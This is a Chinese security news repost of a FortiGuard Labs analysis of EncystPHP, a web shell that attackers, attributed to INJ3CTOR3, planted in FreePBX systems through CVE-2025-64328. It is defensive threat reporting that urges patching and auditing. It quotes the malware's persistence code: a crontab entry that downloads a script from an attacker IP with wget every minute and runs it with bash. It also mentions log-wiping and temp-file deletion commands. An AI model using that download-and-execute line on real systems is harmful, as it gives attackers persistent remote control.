文章总结： FortiGuardLabs披露针对FreePBX的新型WebShellEncystPHP，利用CVE-2025-64328漏洞入侵，归因于INJ3CTOR3组织。该恶意软件模仿合法组件躲避检测，具备远程命令执行能力，并通过wget与crontab实现持久化。建议管理员立即修补漏洞并审计系统以清除潜在后门。 综合评分： 91 文章分类： 恶意软件,漏洞分析,WEB安全,应急响应,威胁情报

无声入侵者：“EncystPHP”Web Shell 潜入 FreePBX 系统

sec随谈 sec随谈

sec随谈

2026年2月2日 08:35 北京

一种复杂的新型Web Shell被发现正在侵入通信基础设施，利用一个关键漏洞将原本无害的电话系统变成持久性后门。这款恶意软件由FortiGuard Labs的研究人员命名为“EncystPHP”，是针对FreePBX环境（一个用于管理VoIP服务的流行开源平台）攻击活动中的最新武器。

这些攻击始于12月初，利用身份验证后命令注入漏洞（CVE-2025-64328）突破网络边界。一旦入侵成功，该恶意软件“具备多种高级功能，包括远程命令执行、持久化机制和Web Shell部署”。

此次攻击活动似乎出自一个熟悉的对手之手。FortiGuard Labs 已将此次活动与黑客组织 INJ3CTOR3 联系起来，该组织曾多次攻击 VoIP 系统。

该组织最初于 2020 年被发现，当时的目标是 CVE-2019-19006 漏洞，随后在 2022 年将目标转向 Elastix 系统。如今，他们再次演变。“我们评估认为，此次攻击活动代表了与 INJ3CTOR3 相关的近期攻击活动和行为模式，”报告指出。

观察到的事件遵循一个明显的模式：“利用FreePBX漏洞，然后在目标环境中部署PHP Web Shell”。在一个有记录的案例中，攻击源自巴西，受害者环境由一家专注于云计算和通信服务的印度科技公司管理。

EncystPHP 的设计旨在融入环境。它通过模仿合法的 FreePBX 组件，试图“逃避立即检测”，从而成为被入侵服务器上的静默驻留程序。

然而，它的强大功能显而易见。Web Shell 为攻击者提供了一套强大的工具包，用于控制受害者的机器。它允许攻击者执行任意系统命令，实际上相当于给了他们 PBX 系统的控制权。

或许最令人担忧的是该恶意软件对持久性的重视。报告详细描述了 EncystPHP 如何使用标准的 Linux 工具建立持久性，确保其在系统重启或简单的清理后仍然存在。

分析显示，“该恶意软件使用 wget 工具设置定时任务，从外部 IP 地址 (45.234.176.202) 下载并执行脚本。” 该恶意软件还会试图掩盖其踪迹，执行诸如 rm -rf /tmp/* 之类的命令来删除临时文件，以及执行 sed 命令来清除日志。

持久化脚本，名为 license.php，包含如下行：system(“echo ‘*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; bash /var/lib/asterisk/bin/devnull2’ | crontab -“);。

此次事件发出严厉警告，通信系统仍然是网络犯罪分子的高价值目标。“此次事件表明，CVE-2025-64328漏洞可被利用来部署隐蔽且持久的Web Shell……这再次强调了未打补丁的PBX系统仍然是高价值的攻击目标。”

运行 FreePBX 的管理员被敦促立即打补丁，并对其系统进行审计，以查找任何 EncystPHP shell 或未经授权的 cron 作业的迹象。正如研究人员指出的那样，虽然这些技术并非全新，但这种威胁“活跃且持续存在”。

参考链接：

http://fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：sec随谈 sec随谈 sec随谈《无声入侵者：“EncystPHP”Web Shell 潜入 FreePBX 系统》